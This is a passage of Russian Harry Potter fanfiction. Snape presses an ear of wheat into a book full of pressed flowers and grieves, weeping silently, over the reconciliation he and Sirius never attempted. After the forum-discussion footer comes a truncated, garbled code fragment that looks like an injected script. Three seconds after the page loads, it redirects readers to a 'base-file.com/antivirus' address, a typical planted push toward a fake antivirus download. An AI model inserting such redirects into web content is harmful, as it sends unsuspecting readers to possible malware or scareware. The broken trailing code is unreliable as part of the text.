Мастер Зелий подошел к книжному шкафу и вытащил с полки тяжеловесный том "Зельеварение в современной жизни". Затем прошел к письменному столу, уселся в кресло и перелистал страницы… Мерлин Великий, чего там только не было! Главным сокровищем этого труда были не напечатанные в нем рецепты, а цветы, цветы, цветы. Целый гербарий: ромашки, шиповник, жимолость, лесные колокольчики, мелисса, лаванда, вербена - всего и не перечислить! И за каждым цветком стояли соединенные судьбы, найденные друзья, обретенная любовь. Он мог собой гордиться. И Северус Снейп гордился.

Он нашел в книге свободное место, ближе к концу, и вложил между страницами невинный колосок, только что соединивший руки двоих непримиримых врагов, но вряд ли подозревавший о своей высокой миссии.

"Несколько минут назад я стал свидетелем настоящего чуда - победы первого робкого чувства над отчуждением. Подумать только, этим мальчикам удалось то, что не смогли сделать мы с Сириусом. Они нашли в себе силы переступить через себя. Всего один шаг - и стена ненависти пала к их ногам, рассыпалась в прах", - Мастер Зелий погладил кончиками пальцев колосок. Ему вдруг показалось, что от ледяных прикосновений тот дрогнул и съежился.

"Гарри, Гарри, какой же ты молодец! Ты смог. Ты понял, что может совершить тепло твоих рук и сердца - разорвать холодные оковы, наложенные традициями, воспитанием, привычкой, неверием самому себе. Одиночеством", - Снейп сцепил руки в замок и в изнеможении уронил на них голову.

"А мы, Сириус, не смогли. Не совершили. Никто из нас не сделал первого шага. Я не сделал. Ты - не подошел. И вот теперь, все что нам с тобой осталось - это ненависть и презрение друг к другу, - Мастер Зелий сдавленно застонал. - О нет, не из-за того, что между нами происходило тогда, в Хогвартсе… Из-за того, что НЕ происходило между нами. Вот это - причина. И неужели не осталось даже надежды?! Маленькой, едва заметной, но надежды на то, что мы еще в силах измениться?! Я готов, а ты? Ты?"

Северус Снейп замер, напряженно вслушиваясь в тишину, ногти впились в ладони - он чувствовал, как горячие капли крови стекают на страницы открытой книги. Он не шелохнулся. Он ждал. Больше всего на свете ему хотелось бы услышать сейчас скрип отворяющейся двери, легкие уверенные шаги, сбивающееся от спешки дыхание. Он ждал, что теплые сильные руки опустятся на его плечи, а охрипший от ветра и странствий голос шепнет на ухо: "Я тоже, Север, я тоже…".

Никто не вошел. Никто не положил руки. Плечи остро и болезненно дрогнули - раз, другой, и затихли. Со стороны могло показаться, что усталый преподаватель просто не выдержал и уснул над очередным трактатом.

Мастер Зелий плакал беззвучно, злыми сухими слезами.

Камин давно уже погас. Было холодно. Так холодно.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>